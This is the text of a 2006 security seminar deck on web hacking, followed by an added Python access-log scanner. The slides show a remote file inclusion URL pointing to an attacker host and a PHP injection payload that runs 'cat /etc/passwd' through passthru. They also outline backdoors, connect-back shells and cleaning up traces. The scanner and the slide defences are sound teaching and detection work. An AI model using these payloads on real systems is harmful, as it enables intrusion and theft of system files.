from 33 to 0 - A journey to be root


  1. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ Batam, 22 July 2006 ] Ahmad Muammar W. K http://www.google.com/search?q=y3dips
  2. theory: how 2 start, lookin for foods, we "drive in", what we choose, web hacking; survive: user, developer, administrator; simulation: from 33 to 0; discussion
  3. do we know hacking? hacker != cracker; hacking is not defacing; f.a.q 4 newbies version 1.0 at http://ezine.echo.or.id/ezine8/ez-r08-y3dips-faqfn.txt
  4. footprinting, scanning, enumeration; need to find a low security machine: lazy admin, un-patched, default are fault, more n more …; getting acquainted with the target
  5. from open port: 80 are open, 22 are open, 25 are open, …; operating system vulnerability: windows xp sp 1, redhat 8.0; remote?; application bug; authentication attack (bruteforcing, password guessing); passive action (sniffing); social engineering
  6. well known services are open? ssh, smtp, https, pop3 … also open; web server are open; should we do web hacking
  7. hacking over http; hacking against web application; web browser attack; using http rules (method)
  8. on the top of the layer; most of server in i-net running web server; how about Firewall? it's a legal request, un-filtered?; dynamically changed; run multiple application (voting, guestbook, e.t.c); more friendly >< more easier
  9. On The Top of Security Level Layer
  10. web browser? (opera, firefox); command line interface (msdos, bash); programming language; reference: advisories
  11. [Diagram: User sends http request (clear text/ssl) through Firewall to Web Server (Apache, IIS, Tomcat, Netscape, e.t.c) with Plugins (Perl, PHP, JSP) and Web application, backed by Database Server (MsSQL, Postgre, Mysql, Oracle); Http reply (HTML, Javascript, VBscript) returns to User]
  12. Web Hacking: Client side attack (xss, cookies stealing); Information Disclosure; OS commanding (SQL, SSI, Ldap, Xpath); Brute Force; Denial Of Service; Path traversal; Remote command execution (php); Etc. Source: http://www.webappsec.org
  13. a type of attack carried out by including another web page into a site/web application. index.php (bug in $file variable): http://victim.com/index.php?file=readme.txt ; http://victim.com/index.php?file=http://echo.or.id
  14. http://advisories.echo.or.id/adv/adv33-K-159-2006.txt
  15. victim; http://echo.or.id
  16. <? phpinfo(); ?>; change url "http://echo.or.id" > http://attacker.xxx/in.txt; real site
  17. a type of attack carried out by remotely including programming-language tags, causing the "vulnerable" web application to execute the "request" that is sent. viewtopic.php (bug at highlight variable): http://victim.com/viewtopic.php?t=48 ; http://victim.com/viewtopic.php?t=48&highlight=%2527.passthru ($HTTP_GET_VARS[a]).%2527&a=id;pwd;cat /etc/passwd
  19. defacing; private data stolen; system compromise; zombie (ddos agent, botnet agent); e.t.c
  20. The act of changing/damaging the appearance of a website, whether its main page (index) or other pages still under the same url as that website (other folders; other files)
  22. Ahmad Muammar W. K.
  23. always update ur system; use a firewall, antivirus, good backup facility, etc; using good password/pass phrase; be careful of social engineering; be careful in using public facility (cyber cafe); secure login/Secure connection (https; ssh); update an information
  24. secure programming; input validation; encryption in authentication; set error log to off; what u need? and what u can?; update an information
  25. policy (strict restriction); optimal setting on server; function restriction: php (passthru, system, exec); mssql (xp_cmdshell, xp_regdeletekey, xp_msver); mysql (system); update the system (security patch/update); update an information
  26. Ahmad Muammar W. K.
  27. getting acquainted; web hacking process; php injection, enumeration; escalating privilege; ptrace-kmod; backdooring; bindtty, connect-back; cleaning our footprints; remove.c
  28. Ahmad Muammar W. K.
  29. http://kaos.echo.or.id
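
A defender-side check for the two request shapes on slides 13 and 17 (a URL passed in the file parameter, and a double-encoded quote with a PHP execution function in highlight), as an added example that is not part of the original deck. The log lines are constructed, and the function names and finding labels are this example's own assumptions.

```python
import re
from urllib.parse import urlsplit, unquote

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
REMOTE_SCHEME = re.compile(r'^(?:https?|ftp)://', re.I)
# Functions slide 25 lists for restriction in PHP.
PHP_EXEC = re.compile(r'\b(?:passthru|system|exec)\s*\(', re.I)

def decode_fully(value, max_rounds=3):
    """Percent-decode until stable; return (decoded, rounds that changed it)."""
    for rounds in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value, rounds
        value = decoded
    return value, max_rounds

def inspect_request(target):
    """Return sorted (parameter, finding) pairs for one request target."""
    findings = set()
    # Split on '&' only, so ';' inside a value stays part of that value.
    for pair in urlsplit(target).query.split("&"):
        name, _, raw = pair.partition("=")
        value, rounds = decode_fully(raw)
        if REMOTE_SCHEME.match(value):
            findings.add((name, "remote-include"))
        if rounds > 1:  # e.g. %2527 -> %27 -> ' slips past one decode pass
            findings.add((name, "double-encoded"))
        if PHP_EXEC.search(value):
            findings.add((name, "php-exec-call"))
    return sorted(findings)

def scan(lines):
    """Map each flagged request target to its findings."""
    report = {}
    for line in lines:
        m = REQUEST.search(line)
        if m and (found := inspect_request(m.group(1))):
            report[m.group(1)] = found
    return report

# Constructed log lines; paths and parameters are the ones on the slides.
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Jul/2006:10:00:01 +0700] "GET /index.php?file=readme.txt HTTP/1.1" 200 512',
    '192.0.2.66 - - [22/Jul/2006:10:00:07 +0700] "GET /index.php?file=http://echo.or.id HTTP/1.1" 200 9120',
    '192.0.2.10 - - [22/Jul/2006:10:01:12 +0700] "GET /viewtopic.php?t=48 HTTP/1.1" 200 4096',
    '192.0.2.66 - - [22/Jul/2006:10:02:30 +0700] "GET /viewtopic.php?t=48&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=id;pwd;cat%20/etc/passwd HTTP/1.1" 200 5210',
]

if __name__ == "__main__":
    for target, found in scan(SAMPLE_LOG).items():
        print(target, found)
```

Matches like these are triage signals for the access log; the fixes remain the ones on slides 24 and 25 (input validation and function restriction).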
